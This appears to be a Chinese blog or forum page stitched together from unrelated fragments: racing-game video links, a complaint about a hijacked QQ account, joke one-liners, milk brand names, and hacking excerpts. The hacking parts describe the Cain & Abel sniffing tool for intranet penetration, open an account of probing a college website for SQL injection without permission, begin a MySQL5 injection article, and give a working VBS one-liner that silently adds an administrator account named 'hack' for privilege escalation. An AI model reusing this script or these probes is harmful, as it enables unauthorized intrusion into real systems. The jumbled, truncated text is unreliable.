http://v.youku.com/v_show/id_XOTE4Mjg5MDA=.html

第二部飞车视频，请同学做了美工，无论在技术和美观方面绝对都比上次的好

   今天像往常一样照常上qq，竟然发现密保卡被人改了，密码什么的也没改，可恶的是我没有绑定手机，想改密保卡还得申诉，一天没上qq，一直以为自己安全措施弄的不错，没想到会出这样的事，如果没有密保卡可能也就能上了，同时也在好奇他到底是怎么办到的呢，看来人类的思维真是可以无限延伸啊，同时也又一次证实了没有绝对的安全这一道理！

1.再逼我,再逼我就装死给你看！
2.鄙视我的人那么多,你算老几?   
3.交给我你就不用放心了,没有错不了的事！
4.别紧张,我不是什么好人......
5.别谢,谢完还怎么好意思向你收钱啊！
6.别和我说放马过来----我是阿凡提！
7.你都不理我,那我成狗不理了！
8.明月几时有,去问易中天！
9.够不着吧,左脚踩右脚上试试
10.有的人活着,她已经死了.有的人活着,他早该死了！
11.你说...你喜欢我?其实...我一开始...其实我也...唉跟你说了吧,其实我也挺喜欢我自己的.
12.

今天心血来潮，做了个飞车视频，跑的也不是很好，不过也不算LJ，讲究看吧

优酷地址：http://v.youku.com/v_show/id_XODEwODgxODA=.html

17173地址：http://vlog.17173.com/v/1/10520/42/NDI0MjQw

HRay注：很强大的东西，虽然现在arp大大不如从前了，不过对一些大型内网的渗透这东西还是离不开的。

Cain & Abel 是由Oxid.it开发的一个针对Microsoft操作系统的免费口令恢复工具。号称穷人使用的L0phtcrack。它的功能十分强大，可以网络嗅探，网络欺骗，破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议，甚至还可以监听内网中他人使用VOIP拨打电话。

前言：自从上了大学后，很久没有搞站了，手也生了，正好听说某个要好的哥们现在在某高校的某学院深造，于是决定对该学院进行一次安全检测，一来为了练手，二来还是为了练手。
    一：百度一下就找到了该学院的网址，访问一下看看，如图1， 清一色的php，随便点了一处带参数的链接，习惯性的加上and 1=1和and 1=2，返回了相同的页面，没

HRay注：关于mysql5的一篇注入文章，也能帮大家补充一些关于mysql5注入的一些新技巧，很经典！

作者：指扣（c_fans）

过年了好忙 各种事情。
对待站我们应该耐心的去对待各种问题。包括以下出到的问题。
由于时间问题。作为版主拿出代表性的几点 希望为以后大家的技术有所帮助。

一 原理分析
我看看mysql5比之前增加的系统数据库information_schema的结构，它是用来

伊俐纯鲜牛奶

伊列酸酸乳

豪牛酸酸乳

某日那某站到了最后阶段，需要备份一个vbs到启动项进行提权，网上找了几个，都是一样的vbs，而且代码很长，备份起来很不方便，于是找了BBE的好友EchoEye要了一个加用户的vbs，代码很少，方便备份，为了自己和大家以后方便使用，决定将代码发布出来

set w=createobject("wscript.shell"):w.run "net user hack echoeye /add",0:w.run "net localgroup administrators hack /add",0
本机测试添加账户成功，最后感谢EchoEye对我的帮助